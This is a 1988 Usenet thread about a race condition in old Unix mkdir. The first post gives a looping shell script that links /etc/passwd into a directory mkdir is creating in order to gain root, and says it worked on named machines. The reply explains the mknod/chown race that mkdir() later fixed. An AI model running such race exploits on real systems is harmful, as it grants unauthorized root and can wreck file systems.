blue@altger.UUCP (blue) (12/02/88)
I am probably saying something already known by everybody.
Anyway, there's (was) a bug on many Unix systems, related to
the mkdir and ln commands.
Practically, ANYONE could be root on such systems, by working out
a simple shell script like this one:
while true
do
nice -39 mkdir foo &
rm -rf foo
ln /etc/passwd foo; rm -fr foo &
ls -l /etc/passwd
done
What happens is that sometimes - on old versions - you fool Unix by catching
mkdir while it is creating its i-nodes. There has to be a millisecond while
mkdir has created HIS foo, and is going to change ownership to yours.
Ok, being new on Usenet maybe i missed this explanation 1000 times.
What's incredible is that this trick worked out perfectly few months ago
on altger here, an Altos 386 running Unix Sys V.3, worked again on
Unix/386 i think on IBM PS-2/80, where instead of passwd /dev/hd00 was
linked successfully (system: aragon). Worked still better on Altos Xenix
386 (altos 2000? dos the "linker" does not work, but all you have to do is change
the nice value, add some slowdown , run two linkers at the same time etc.
Side effects: file system will need to be checked out after reboot.
Worst side effects: if this works , run by an hacker, you probably
won't find any file system at all...maart@cs.vu.nl (Maarten Litmaath) (12/07/88)
blue@altger.UUCP (blue) writes:
\ while true
\ do
\ nice -39 mkdir foo &
\ rm -rf foo
\ ln /etc/passwd foo; rm -fr foo &
\ ls -l /etc/passwd
\ done
This is precisely why nowadays there's a mkdir() system call!
Formerly the mkdir scheme was as follows:
mknod(path, S_IFDIR, dev);
/* now the directory exists, its owner is root and it's empty */
chown(path, uid, gid); /* now the owner is set */
chdir(path);
link(path, "."); /* make entry `.' in new directory */
link(parent, ".."); /* make entry `..' */
The `rm -rf foo; ln /etc/passwd foo' must `hit' right AFTER the mknod(), but
BEFORE the chown(). Due to race conditions this scheme will eventually succeed.
--
fcntl(fd, F_SETFL, FNDELAY): |Maarten Litmaath @ VU Amsterdam:
let's go weepin' in the corner! |maart@cs.vu.nl, mcvax!botter!maart